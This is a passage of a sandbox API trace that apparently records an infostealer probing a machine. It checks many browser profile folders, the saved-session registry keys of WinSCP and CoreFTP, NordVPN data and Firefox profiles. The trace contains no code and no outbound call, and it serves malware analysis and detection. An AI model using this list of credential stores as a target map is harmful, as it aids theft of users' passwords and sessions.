[0179.865] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable", lpFilePart=0x0) returned 0x41 [0179.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.866] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.866] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x36 [0179.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.866] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.866] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x42 [0179.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.866] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x3c [0179.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x39 [0179.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\7star\\7star\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x35 [0179.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iridium\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x34 [0179.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\liebao\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x44 [0179.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.868] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maplestudio\\chromeplus\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x34 [0179.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.868] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chedot\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x34 [0179.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.868] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3d [0179.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.868] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\sputnik\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x33 [0179.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x35 [0179.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Chrome\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Chrome\\Chrome\\User Data", lpFilePart=0x0) returned 0x3e [0179.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Chrome\\Chrome\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\360chrome\\chrome\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x42 [0179.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yandexbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x49 [0179.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3e [0179.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f044 | out: phkResult=0x19f044*=0x0) returned 0x2 [0179.934] CoTaskMemAlloc (cb=0x20c) returned 0x5cd5b8 [0179.934] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5cd5b8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0179.935] CoTaskMemFree (pv=0x5cd5b8) [0179.935] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0179.936] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NordVPN", nBufferLength=0x105, lpBuffer=0x19eb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NordVPN", lpFilePart=0x0) returned 0x2b [0179.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f024) returned 1 [0179.936] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NordVPN" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nordvpn"), fInfoLevelId=0x0, lpFileInformation=0x2319bd0 | out: lpFileInformation=0x2319bd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f020) returned 1 [0179.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0179.949] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x19d780, nSize=0x80 | out: lpBuffer="") returned 0x25 [0180.040] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Flock\\Browser\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Flock\\Browser\\profiles.ini", lpFilePart=0x0) returned 0x40 [0180.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef08) returned 1 [0180.040] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Flock\\Browser\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\flock\\browser\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5c8) returned 1 [0180.166] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\FTPWare\\COREFTP\\Sites", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f068 | out: phkResult=0x19f068*=0x0) returned 0x2 [0180.169] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles.ini", lpFilePart=0x0) returned 0x48 [0180.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.169] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.223] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles.ini", lpFilePart=0x0) returned 0x48 [0180.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.223] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.239] CoTaskMemAlloc (cb=0x20c) returned 0x5ced18 [0180.239] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5ced18 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0180.240] CoTaskMemFree (pv=0x5ced18) [0180.240] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0180.241] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x3c [0180.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0180.241] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0180.243] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", lpFilePart=0x0) returned 0x42 [0180.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0180.243] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0180.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0180.271] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", lpFilePart=0x0) returned 0x42 [0180.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 